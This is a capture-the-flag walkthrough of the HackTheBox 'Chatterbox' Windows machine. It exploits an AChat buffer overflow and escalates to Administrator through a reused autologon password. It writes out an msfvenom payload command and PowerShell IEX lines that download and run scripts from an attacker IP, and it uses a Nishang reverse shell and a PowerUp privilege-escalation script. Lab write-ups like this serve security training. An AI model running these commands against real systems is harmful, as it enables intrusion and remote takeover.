Chatterbox - HTB Series

# HTB Series - Chatterbox ###### tags: `htb` `chatterbox` `windows` `walkthrough` We start by scanning the target with nmap to find open ports ![image](https://hackmd.io/_uploads/SJQc3gr9R.png) Drilling down to the ports marked with the tcpwrapped service ![image](https://hackmd.io/_uploads/Hk5N_fHqR.png) Using searchsploit ```searchsploit achat``` ![image](https://hackmd.io/_uploads/BkfhdzB5C.png) I don't want to figure out the directory for this so I'll just paste it into current directory with ```searchsploit -m exploitID``` ![image](https://hackmd.io/_uploads/HJ7nKzrcR.png) ## Exploit Logic - The achat service is vulnerable to a buffer overflow exploit. - To leverage the exploit, we generate a payload with msfvenom based on powershell and we specify a file to be downloaded on the remote server (in this case we name it Awaken.rocks) - Start a python web server from which the file (Awaken.rocks) will be downloaded - We create a listener on the desired ip and port with netcat - We run the exploit and that should open up a reverse shell on the listening port. ### Achat service vulnerability Based on [Achat exploit](https://www.exploit-db.com/exploits/36025) ### Generate payload Use the command to create the desired exploit ```=1 msfvenom \ -a x86 \ --platform Windows \ -p windows/exec \ CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/Awaken.rocks')\"" \ -e x86/unicode_mixed \ -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xe... -f python \ >> pay # or as a one-liner msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/Awaken.rocks')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python >> pay ``` ![image](https://hackmd.io/_uploads/ryJCMy8cR.png) Use the output payload to edit the python script and edit the server address details at the bottom ![image](https://hackmd.io/_uploads/ByP317HcC.png) We can use the nishang powershell script to invoke a reverse shell then set up a listener on the desired port Remember to change the IP address and port, copy the line to the bottom of the nishang script, then copy the script to the folder where you will run the webserver to have the victim download the script from. ![image](https://hackmd.io/_uploads/rkvPRRB5A.png) ### Edited Nishang Invoke Powershell Script ![image](https://hackmd.io/_uploads/B19iRRHq0.png) ### Connection Established to Listener ![image](https://hackmd.io/_uploads/SyJRa0ScR.png) ### Establish current privs ```whoami /all``` ![image](https://hackmd.io/_uploads/SJWgMl890.png) ## Escalating Privileges We can leverage the Powersploit suite of tools, specifically the Privilege Escalation tools > PowerUp script to escalate privileges. Copy the PowerUp.ps1 script to the folder being served on the webserver then from the shell earlier acquired download the PowerUp Script and run the Invoke-All Checks command ``` =1 PS> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/PowerUp.ps1') PS> Invoke-All Checks ``` ![image](https://hackmd.io/_uploads/HyWLElL90.png) From the output we can see Registry Autologons are enabled and the default password. Lets take a look at the users on the machine ![image](https://hackmd.io/_uploads/BJLkjeU90.png) We note there is an Administrator user. Following a similar methodology, lets try to spawn a reverse shell using the Invoke Power Shell script from earlier and pass in the default password as the password for the administrator. ```=1 PS> $SecPass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force PS> $cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPass) PS> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.5/okiro.ps1')" -Credential $cred ``` ![image](https://hackmd.io/_uploads/BJ9SslI5R.png) Set up a listener on the desired port and when you download the script, a reverse shell is spawned as admin ![image](https://hackmd.io/_uploads/Hktx2eL5R.png)